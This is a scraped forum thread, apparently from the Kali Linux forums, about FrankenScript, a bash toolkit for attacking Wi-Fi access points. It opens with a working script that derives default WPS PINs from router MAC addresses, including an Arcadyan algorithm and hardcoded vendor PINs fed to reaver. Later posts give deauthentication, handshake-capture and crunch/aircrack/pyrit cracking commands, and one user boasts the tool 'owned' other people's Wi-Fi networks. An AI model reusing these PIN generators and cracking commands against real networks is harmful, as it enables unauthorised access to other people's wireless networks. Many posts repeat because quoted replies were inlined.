#!/bin/bash
#
#
#
################################################## ###################

AP_essid=$(cat $HOME/FrankenScript/Scripts/AP_essid.txt)
AP_bssid=$(cat $HOME/FrankenScript/Scripts/AP_bssid.txt)
ESSID=$(echo $AP_essid)
BSSID=$(echo $AP_bssid)

################################################## ###################

FUNC_CHECKSUM(){
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`

DIGIT=`expr $ACCUM '%' 10`
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`

PIN=`expr $PIN '+' $CHECKSUM`
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`

RESTE=`expr $ACCUM '%' 10`
}

CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')

FINBSSID=$(echo $BSSID | cut -d ':' -f4-)

MAC=$(echo $FINBSSID | tr -d ':')

CONVERTEDMAC=$(printf '%d\n' 0x$MAC)

FINESSID=$(echo $ESSID | cut -d '-' -f2)

PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')

CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')

MACESSID=$(echo $PAREMAC$FINESSID)

STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`

PIN=`expr 10 '*' $STRING`

FUNC_CHECKSUM

PINWPS1=$(printf '%08d\n' $PIN)

STRING2=`expr $STRING '+' 8`
PIN=`expr 10 '*' $STRING2`

FUNC_CHECKSUM

PINWPS2=$(printf '%08d\n' $PIN)

STRING3=`expr $STRING '+' 14`
PIN=`expr 10 '*' $STRING3`

FUNC_CHECKSUM

PINWPS3=$(printf '%08d\n' $PIN)

if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];

then

CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)

RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`

STRING4=`expr $RAIZ '+' 7`

PIN=`expr 10 '*' $STRING4`

FUNC_CHECKSUM

PINWPS4=$(printf '%08d\n' $PIN)

echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 "
PIN4REAVER=$PINWPS4
else
case $CHECKBSSID in
04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1
$RED"Other Possible Pin"$RED:$STAND $PINWPS2
$RED"Other Possible Pin"$RED:$STAND $PINWPS3"
PIN4REAVER=$PINWPS1
;;
001915)
echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
PIN4REAVER=12345670
;;
404A03)
echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
PIN4REAVER=11866428
;;
F43E61 | 001FA4)
echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
PIN4REAVER=12345670
;;
001A2B)
if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
PIN4REAVER=88478760
else
echo -e "PIN POSSIBLE... > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
3872C0)
if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
PIN4REAVER=18836486
else
echo -e "PIN POSSIBLE > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
FCF528)
echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
PIN4REAVER= 20329761
;;
3039F2)
echo -e "several possible PINs, ranked in order>
16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
A4526F)
echo -e "several possible PINs, ranked in order>
16538061 88202907 73767053 16702738 43297917 18355604 "
PIN4REAVER=16538061
;;
74888B)
echo -e "several possible PINs, ranked in order>
43297917 73767053 88202907 16538061 16702738 18355604"
PIN4REAVER=43297917
;;
DC0B1A)
echo -e "several possible PINs, ranked in order>
16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
PIN4REAVER=$PINWPS1
;;
002275)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
08863B)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
001CDF)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
00A026)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
5057F0)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
C83A35 | 00B00C | 081075)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
E47CF9 | 801F02)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
0022F7)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
*)
PIN4REAVER=$PINWPS1
;;
esac
fi

you should collect the arcadyan mac to redact your case in condition


;;
XXXXXX | XXXXXX)

where you have the X you put the 6 first digit of aracdyan the mac without the 2 points

and then you generate string


deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})
K1=$((($c1)%16))
K2=$((($c2)%16))
X1=$((K1^${deci[3]}))
X2=$((K1^${deci[2]}))
X3=$((K1^${deci[1]}))
Y1=$((K2^0x${hexi[1]}))
Y2=$((K2^0x${hexi[2]}))
Y3=$((K2^0x${hexi[3]}))
Z1=$((0x${hexi[2]}^${deci[3]}))
Z2=$((0x${hexi[3]}^${deci[2]}))
Z3=$((K1^K2))
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)

than you generate the checksum to get the full PIN


PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PIN4REAVER=$(printf '%08d\n' $PIN)


that will give you


;;
XXXXXX | XXXXXX)
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})
K1=$((($c1)%16))
K2=$((($c2)%16))
X1=$((K1^${deci[3]}))
X2=$((K1^${deci[2]}))
X3=$((K1^${deci[1]}))
Y1=$((K2^0x${hexi[1]}))
Y2=$((K2^0x${hexi[2]}))
Y3=$((K2^0x${hexi[3]}))
Z1=$((0x${hexi[2]}^${deci[3]}))
Z2=$((0x${hexi[3]}^${deci[2]}))
Z3=$((K1^K2))
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PIN4REAVER=$(printf '%08d\n' $PIN)


taht you have to place in your case esac sentence, anywhere untill it is before

;;
*)

Sorry mate I mean't would you be able to amend the script I posted so I only have to paste it back into FrankenScript.

I know its kinda cheeky to ask, sorry. :-)

I've been in stupid mode for the last few days and I'm having trouble following even simple things. LOL

;)

At least explain me more what you want to do, how you want to call the variables, where it is supposed to go, for what...
you want to generate the PIN for all devices or just for arcadyan?
( it seems that the arcadyan algorithm is used by Askey on some models :confused: if i get confirmation of this i will post it here
cheers

;)

At least explain me more what you want to do, how you want to call the variables, where it is supposed to go, for what...
you want to generate the PIN for all devices or just for arcadyan?
( it seems that the arcadyan algorithm is used by Askey on some models :confused: if i get confirmation of this i will post it here
cheers

Would it be possible to have it setup like the one I posted above (In a separate script), and have it generate the pin for all devices.
Then I can put the script into a folder rather than putting it directly into FrankenScript.

Many thanks matey. :D

Updated FrankenScript to 3.2.

Slim,

at different points when I have to click [enter] to start a scan, a second terminal window opens then closes again quickly. I just downloaded 3.2 and it is still doing it.

Slim,

at different points when I have to click [enter] to start a scan, a second terminal window opens then closes again quickly. I just downloaded 3.2 and it is still doing it.

Can you provide more details please mate, I need to know exactly where it happens.

If anyone else is having issues please post the details and I'll look into it.

root@kali:~# cd FrankenScript/
root@kali:~/FrankenScript# ./FrankenScript.sh


#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################

Chosen Interface:
System Mode: Networking Mode Is Enabled
MAC address for mon0:

Please choose an option?: 3




Scan for WPS enabled access points.
Press Ctrl+c on the wash screen to stop the scan and to choose a target.
Press [Enter] to launch the scan.

Please wait...

[ I THINK THIS IS WHERE THE SECOND WINDOW OPENS FOR HALF A SECOND AND THEN CLOSES AND I AM BACK TO THE PRIMARY WINDOW]

















Available Access Points.



Please input the number of your chosen target:

root@kali:~# cd FrankenScript/
root@kali:~/FrankenScript# ./FrankenScript.sh


#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################

Chosen Interface:
System Mode: Networking Mode Is Enabled
MAC address for mon0:

Please choose an option?: 3

Scan for WPS enabled access points.
Press Ctrl+c on the wash screen to stop the scan and to choose a target.
Press [Enter] to launch the scan.

Please wait...

[ I THINK THIS IS WHERE THE SECOND WINDOW OPENS FOR HALF A SECOND AND THEN CLOSES AND I AM BACK TO THE PRIMARY WINDOW]

Available Access Points.

Please input the number of your chosen target:

Hmmm, did the wash scan work ok?.

slim... this may just be me... see below... it worked correctly this time when i chose to disable processes that might cause issues: Y

********************************************

Please choose an option?: 1




Available WiFi Adapters.
########################

1: wlan0

Please input the number of your chosen WiFi adapter: 1


















#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################

Chosen Interface: wlan0
System Mode: Networking Mode Is Enabled
MAC address for mon0:

Please choose an option?: 2




What system mode would you like to set.
[1] = Put The System Into Networking Mode.
[2] = Put The System Into Attack Mode.
[3] = Return To Menu.
1, 2 or 3?: 2



















Would you like to disable processes that might cause issues y/n?: y

Would you like to disable NetworkManager y/n?: y

Would you like to disable wpa_supplicant y/n?: y





















Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
3051 dhclient
3057 dhclient


Interface Chipset Driver

wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)


Permanent MAC: b8:8d:12:30:6b:f2 (unknown)
Current MAC: b8:8d:12:30:6b:f2 (unknown)
New MAC: 40:2d:60:68:79:8f (unknown)




#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################

Chosen Interface: wlan0
System Mode: Attack Mode Is Enabled
MAC address for mon0: 40:2d:60:68:79:8f

Please choose an option?: 3




Scan for WPS enabled access points.
Press Ctrl+c on the wash screen to stop the scan and to choose a target.
Press [Enter] to launch the scan.

Glad to hear its working for you, You'll have to have a little play with it to get use to it and to find out what works for you.

So what's your opinions regarding FrankenScript?, anything you would like to see added to it?.
All constructive criticism welcome. :-)

Due to the lack of feedback and interest I very much doubt that I'll be releasing any further updates or scripts.

id like to see other things you release

I'm very interested in trying this out slim. and major props for making it

I will be testing it out tonight on BT5 R3 and see if it works. It should in theory since I have dhcp3 client / server and mdk3 already installed and up to date.

I am also installing kali right now on another USB stick so we'll see how this goes.

Once again thanks for this major works. I looked at the script and it is huge. One of the largest I've ever seen next to Social engineering toolkit.

Hi slim,

I finally have time to try your script in the weekend with WPS attack option for my TP-Link N750 router. Your script worked great, wash has no problem to find wps enabled APs and options for reaver is easy to incorporate. Just my router locked out easily but your mdk3 options come in handy to reset it. I think its just a matter of time for me to attack my router successfully.

You script is great to put many tools together for pentesting APs. I have yet to try attacking handshakes with your script.... can't wait to see your new update!

:D

I've already updated option 6 again, it now supports drag and drop a wordlist or directory containing multiple wordlists.
Not sure if I'm going upload it for everyone though, but I guess time will tell.

Hi slim,

I finally have time to try your script in the weekend with WPS attack option for my TP-Link N750 router. Your script worked great, wash has no problem to find wps enabled APs and options for reaver is easy to incorporate. Just my router locked out easily but your mdk3 options come in handy to reset it. I think its just a matter of time for me to attack my router successfully.

You script is great to put many tools together for pentesting APs. I have yet to try attacking handshakes with your script.... can't wait to see your new update!

:D

Thanks for testing MDK3 for me hahahah... I haven't had time to test it but I guess it's working! Good job slim!

To soxrox 2212

Any chance you could send us version 2. We tried kali-linux win7 and XP for hours.

Muskt Team A

To soxrox 2212

Any chance you could send us version 2. We tried kali-linux win7 and XP for hours.

Muskt Team A

Version 2 of what?

Sorry Soxrox we were refering to FrankenScript-v3.2 our mistake. We are unable to download a copy where we are at present.

Sorry Soxrox we were refering to FrankenScript-v3.2 our mistake. We are unable to download a copy where we are at present.

Sure I'll e-mail you it.

Any more updates on the script coming?

Any more updates on the script coming?

It's changed a lot since I last posted it here, I've added new features, options, and tools. ;-)
People didn't want to leave any feedback so I stopped uploading it.
I can't fix things for others if they won't tell me what is and isn't working for them.

It's changed a lot since I last posted it here, I've added new features, options, and tools. ;-)
People didn't want to leave any feedback so I stopped uploading it.
I can't fix things for others if they won't tell me what is and isn't working for them.

Guess I'll go do some bug hunting soon ;)

slim76 just wanted to let you know that I really love your script and I would love to get the updated version of it. It owned copule of Wifis in minutes so far with it :D

So was this script incorporated in 1.0.7?

How can we follow development of FrankenScript slim76? These forums are not the best way to get feedback from what I've noticed.

Anyways, continue the good work!!

Slim, I was wondering if you could add a Belkin default password generator. Here is the git page from the developer (https://[email protected]/dudux/belkin4xx.git), safari tells me that there may be possible phishing on the site but I think its clean... Proceed with caution. The original thread is here. (https://forums.kali.org/showthread.php?18943-Belkin-SSID-and-WPA-WPA2-correlation) Let me know if you can get it working!

@ learning.
I'm currenly rewriting a couple of the attack options, then I'll upload it.

@ Quest.
It's not included in Kali but you can download it from the first page, if the links are dead you can ask another member if they'll upload it for you, or you can wait for the updated version.

@ soxrok2212.
I added Belkin default password generator ages ago lol, I also added some others too. :-)

To all,
Will upload the new version when I've rewriten some of the options.

That is just great!

If someone that actually knows what he's doing can write a short Howto for that new version(to come) of FrankenScript, it will be appreciated. As obvious as some operations may seem to some of you, it is a complete mystery for others.

If some of you can 'torrent' it, It will facilitate accessibility for all.

Thank you for all the work Slim!! :) Hopefully it will make it's way in the next Kali.

That is just great!

If someone that actually knows what he's doing can write a short Howto for that new version(to come) of FrankenScript, it will be appreciated. As obvious as some operations may seem to some of you, it is a complete mystery for others.

If some of you can 'torrent' it, It will facilitate accessibility for all.

Thank you for all the work Slim!! :) Hopefully it will make it's way in the next Kali.

There's no need to torrent it as its only a small file, and no need for a how to either cause it's dummy proof. LOL

dummy proof is good! Torrent though might help you diffuse your work. Any ETA on the new version Slim?

dummy proof is good! Torrent though might help you diffuse your work. Any ETA on the new version Slim?

I've got a lot going on at the moment but hope to have it ready within the next few days if all goes well.

Here's the latest FrankenScript.

WHEN DOWNLOADING, DO NOT CLICK THE BIG DOWNLOAD BUTTON AT THE TOP OF THE PAGE.

FrankenScript2-10-06-2014.tar.gz
http://mir.cr/0HBX0O5C

some of the downloads are NOT FrankenScript2-10-06-2014.tar.gz But FrankenScript2-10-06-2014.tar.gz.exe (322*576 b).

The download should be 1*081*616 b in size, named FrankenScript2-10-06-2014.tar.gz, and not an exe.

Thank you Slim!!

So here's a little feedback.

It's working well, selecting the wifi adapter and starting wash. Then wash hangs(noting to do with FS2, has do do with wash) on a certain router. From that point I cannot do anything but stop the process. So that's my feedback.

So here's a little feedback.

It's working well, selecting the wifi adapter and starting wash. Then wash hangs(noting to do with FS2, has do do with wash) on a certain router. From that point I cannot do anything but stop the process. So that's my feedback.

Many thanks for the feedback.
I've never heard of that issue before, are you sure its not something to do with your setup?.
When wash hangs can you continue through the script if you press Ctrl+c on the wash screen?.

Many thanks for the feedback.
I've never heard of that issue before, are you sure its not something to do with your setup?.
When wash hangs can you continue through the script if you press Ctrl+c on the wash screen?.

that's because most know how scripts works, and install it in the right directory, 'Home'(root) folder. Mine was in a sub-folder of 'Home'. Now I know x/

Everything is working fine now. Wash and airodump-ng starts and give me the choice of the target. Vicious little **** you've created there Slim!!

I have not explored all possibilities yet. Some of the things I've noticed to maybe improve FS:

- console windows popping up is somewhat 'unpleasant', though no big deal, it must do what its got to do, the functionalities matter the most, and I doubt that there's anything you can do about it, as FS calls different processes and they most have their own console window to operate in. Just pointing it out, as it is somewhat distracting when multitasking. Something like Wifite comes to mind here as a solution(?)

- I cannot surf on one wifi adapter and use FS2 on another at the same time. Or am I missing something again? Network manager must be off right?



Edit:
Swearing

- I cannot surf on one wifi adapter and use FS2 on another at the same time. Or am I missing something again? Network manager must be off right?
Nevermind. Having the network manager open and using FS2 does work. So surfing and testing at the same time is possible. Slowly un-confusing myself after a bad start here.

Nevermind. Having the network manager open and using FS2 does work. So surfing and testing at the same time is possible. Slowly un-confusing myself after a bad start here.

Sorry there's no instructions. LOL
Glad its working for you and many thanks for taking the time to leave feedback. :-)

Slim, what are the option(s) to attack a wpa protected network that does not have wps(pin number) with FS2?

Does this technique without dictionary looks familiar to you?

1. scan

airodump-ng mon0

2. listening

airodump-ng -c CH# --bssid 'BSSID' showstatistics -w 'filename' 'interface'
airodump-ng -c 11 --bssid 58:98:35:CB:A2:77 --showack -w filemario mon0

3. deauthenticate a client

aireplay-ng -0 10 -a 'BSSID' -c 'CLIENT:MAC:ADDRESS' 'interface'
aireplay-ng -0 10 -a 58:98:35:CB:A2:77 -c 70:D4:F2:91:AE:67 mon0

4. crunch

crunch 8 8 0123456789 | aircrack-ng -a 2 'filename.cap' -e '”essid”' -b 'HANDSHAKE' -w -
crunch 8 8 0123456789 | aircrack-ng -a 2 filemario-01.cap -e “mario” -b 58:98:35:CB:A2:77 -w -

I've seen something similar in FS2, but dictionary dependent -OR-(as the tradition will have it) I'm missing something?

I'm not sure what you are asking.

If you mean you want to capture a wpa/wpa2 handshake:
Choose option [1] from the main menu, then choose a target network that is wpa/wpa2 encrypted.
Then choose option "[1] = WPA/WPA2 Handshake Capture" from the menu.

Or if you are asking how to attack a handshake capture file without a dictionary:
crunch 10 10 abcdef23456789 -d 3 | pyrit -e $AP_essid -i - -o - passthrough | cowpatty -d - -r $HOME/FrankenScript/temp/$Capture_File -s $AP_essid

Or if you are asking if the above command is in FrankenScript2:
I removed most of the options to attack a handshake capture file, but I'll be rewritting them and adding them again at some point.

Hope at least one of those answered your question?. LOL

Thank you, that pretty much answered my questions.

Slim, what are the chances of you and repzeroworld, i) joining your scripts together, and then ii) turning your scripts into an application?

You can check out repzeroworld script here https://forums.kali.org/showthread.php?19641-Reaver-WPS-Locked-Situation-and-Useful-Link/page3

I'm asking because it would be alot easier to invoke both of your scripts in one application with a simple command, and then it could be incorporated in the next Kali.

You're welcome mate.

From my point of view the chances are slim to none, at this moment in time it's beyond my knowlledge.
FrankenScript is a basic script, it hasn't even been written very well. LOL
FrankenScript isn't copyright protected and people are free to do whatever they like with it.

PLEASE NOTE:
FrankenScript uses other scripts/tools that were created by other people, it would be a useless script without these other scripts/tools (Many thanks to everyone).
If anyone is interested in what scripts/tools are used then please research them for your self, I only say this because listing them all would take forever and missing someone out might offend them.

I started a topic (in Kali Linux General Use) asking if anyone knows how to make such a program. Something that would seekout scripts in the root folder and give the user the choice of scripts to be lunched. That would solve it right there.

I started a topic (in Kali Linux General Use) asking if anyone knows how to make such a program. Something that would seekout scripts in the root folder and give the user the choice of scripts to be lunched. That would solve it right there.

That shouldn't be to hard to achieve, FrankenScript uses the same method to detect capture files in the capture file folder. ;-)

so you just officially offered to create such an application! Great! Thank you! You're the best Slim! The community will be for ever grateful!

Here are some ideas for the name of the program..


Lazyboy
ScriptFinder
Shepherd
....


:D

is it Work for WPS Crack ? i mean Crack for Pin Number ?

is it Work for WPS Crack ? i mean Crack for Pin Number ?

It uses reaver so yes it can crack wps.
It also uses several scripts that can generate the wps pin for some but not all routers.

so you just officially offered to create such an application! Great! Thank you! You're the best Slim! The community will be for ever grateful!

Here are some ideas for the name of the program..


Lazyboy
ScriptFinder
Shepherd
....


:D

I've added this function and I'll upload the updated version when I've finished adding the other wordlist/passthrough cracking options.

no way!!!! Thanks! I will check it out as soon as I'm done with writing a howto in the Howto section for some other stuff.


:D

Slim, does this (http://anonsvn.wireshark.org/wireshark/trunk/manuf) looks familiar to you? It's a router identification list based upon MAC address bssid. It would be useful to implement, and have FrankenScript tell the operator which make(name of the company) is the target(router) as with some makes of routers I've had to install Reaver 1.3, as 1.4 had big problems with some of them. Sometimes all version of reaver will fail where Bully will succeed.

That may save the operator many hours/days of futile attempts :mad:

You can have a look here (https://forums.kali.org/showthread.php?21650-Find-Router-Make-and-Model-Over-Wi-Fi) to find the model number, and possible even the serial number here also!

i got this error : Press [Enter] to stop the airodump scan and continue.xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Wash_Network_Scan.txt: 2:No such file or directory
Wash_Network_Scan.txt is not exit on my folder also i create it but same .. and i cant chose AP

Also on my Reaver i stuck on Sending identity response

[+] Waiting for beacon from 64:68:0C:59:2C:9A
[+] Switching mon0 to channel 3
[+] Associated with 64:68:0C:59:2C:9A (ESSID: WLAN_23)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

Can help me why reaver stuck on this step ?

i got this error : Press [Enter] to stop the airodump scan and continue.xterm: cannot open /root/FrankenScript2/Temp_Working_Dirctory/Wash_Network_Scan.txt: 2:No such file or directory
Wash_Network_Scan.txt is not exit on my folder also i create it but same .. and i cant chose AP

Also on my Reaver i stuck on Sending identity response

[+] Waiting for beacon from 64:68:0C:59:2C:9A
[+] Switching mon0 to channel 3
[+] Associated with 64:68:0C:59:2C:9A (ESSID: WLAN_23)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

Can help me why reaver stuck on this step ?

Copy the FrankenScript2 folder and contents to your home folder then try it again.

I'm trying to get Bully working but it keeps trying the same pin over and over again, has anyone else had the same problem and can anyone advise me how to fix the issue?.

what's the syntax Bro?

It works out of the box for me(no special steps). I just enter simple syntax

bully monX -c XX -b XX:XX:XX:XX:XX:XX -v3

or


bully monX -c XX -b XX:XX:XX:XX:XX:XX -v3 -p XXXX
when specifying a certain first four pin number.

what's the syntax Bro?

It works out of the box for me(no special steps). I just enter simple syntax

bully monX -c XX -b XX:XX:XX:XX:XX:XX -v3

or


bully monX -c XX -b XX:XX:XX:XX:XX:XX -v3 -p XXXX
when specifying a certain first four pin number.

Already tried those but cheers anyway matey :-)

Hi there slim,

I've been trying out your script, I'm a big fan!

So far, I was able to capture my handshake and I noticed it auto converts to .hccap. I've seen here in the thread that there was an option to attack a handshake file from within the script. Has this been removed or am I using an old version? I went through the script and couldn't find any feature that relates.

Cheers

Hi there slim,

I've been trying out your script, I'm a big fan!

So far, I was able to capture my handshake and I noticed it auto converts to .hccap. I've seen here in the thread that there was an option to attack a handshake file from within the script. Has this been removed or am I using an old version? I went through the script and couldn't find any feature that relates.

Cheers
I think I removed the options from the version you're using, but I'll upload an updated version later today or tomorrow if all goes well.

FrankenScript2 Information.
=================

[1] Scan And Attack AP's:
-------------------------
Auto check/auto enable monitor mode function.
MAC address spoofing options.
Kill processes options (airmon-ng check kill).
Network scanners - wash & airodump-ng combined.
Sort displayed scan results by Signal Strength, Attack Method, or Orignally Displayed.
Default access point WEP/WPA passkey generators.
WEP Attacks - Aircrack Tools.
WPA/WPA2 Attacks - Aircrack Tools.
WPS Attacks - Reaver & Bully & Default WPS-Pin generators.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[2] Return To Scanned AP's:
---------------------------
Returns you to the last network scan.

[3] Attack Handshake.cap Files:
-------------------------------
[1] = Wordlist + Pyrit + Cowpatty (Non-Resumable).
Simple capture file presentation & selection.
Drag & drop a wordlist onto the screen, or manually input the path and file name.
Attack method - Two attacks are run at the same time (Same processing power but the chances of getting the passkey sooner are greater):
Attack 1 - Works through a wordlist from the beginning to the end.
Attack 2 - Works through a wordlist from the end to the beginning.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[2] = Passthrough Attack (Resumable).
Start a new attack option.
Easy capture file selection.
Configurable passkey's creation options.
Attack - Crunch Pyrit cowpatty.
Resume an attack.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[4] Script Launcher:
--------------------
Launch other scripts.
Scripts must be placed in the $HOME/FrankenScript2/Scripts folder.
Script file names can't contain any blank spaces or special characters.

[5] WiFi Adapter Override:
--------------------------
WiFi adapter selection, only available if multiple wifi adapters are present.

[6] System Mode Override:
-------------------------
Switch between "Networking Mode & Attack Mode".

[7] Recovered Passkey's:
------------------------
Displays all recovered passkeys.
Recovered passkey file: $HOME/FrankenScript2/Recovered-Passkeys.txt

[0] Exit FrankenScript2:
------------------------
Removes tempory files.
Disables attack mode and re-enables networking mode.
Exit the script.

I think I removed the options from the version you're using, but I'll upload an updated version later today or tomorrow if all goes well.

FrankenScript2 Information.
=================

[1] Scan And Attack AP's:
-------------------------
Auto check/auto enable monitor mode function.
MAC address spoofing options.
Kill processes options (airmon-ng check kill).
Network scanners - wash & airodump-ng combined.
Sort displayed scan results by Signal Strength, Attack Method, or Orignally Displayed.
Default access point WEP/WPA passkey generators.
WEP Attacks - Aircrack Tools.
WPA/WPA2 Attacks - Aircrack Tools.
WPS Attacks - Reaver & Bully & Default WPS-Pin generators.
Recovered passkeys are saved in $HOME/FrankenScript2/Recovered-Passkeys.txt.

[2] Return To Scanned AP's:
---------------------------
Returns you to the last network scan.

[3] Attack Handshake.cap Files:
-------------------------------
[1] = Wordlist + Pyrit + Cowpatty (Non-Resumable).
Simple capture file presentation & selection.
Drag & drop a wordlist onto the screen, or manually input the path and file name.
